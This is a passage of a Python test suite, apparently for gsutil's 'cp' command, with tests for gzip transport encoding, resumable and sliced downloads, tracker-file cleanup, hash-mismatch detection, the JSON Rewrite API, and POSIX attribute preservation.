"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
# Generate some reasonably incompressible data. This compresses to a bit
# around 128K in practice, but we assert specifically below that it is
# larger than self.halt_size to guarantee that we can halt the download
# partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
random.choice(string.ascii_letters) for _ in xrange(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
return long(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
'Compresed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
# Tracker files will have different names depending on if we are
# downloading sequentially or in parallel.
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. Finding the location of our test
# data varies depending on how/where gsutil was installed, so we get the
# data via pkgutil and use this workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': hashlib.md5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': hashlib.md5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
# where the contents finish uploading before we artifically halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(_JSONForceHTTPErrorCopyCallbackHandler(5, 404)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
def test_cp_minus_c(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)])
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preseve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
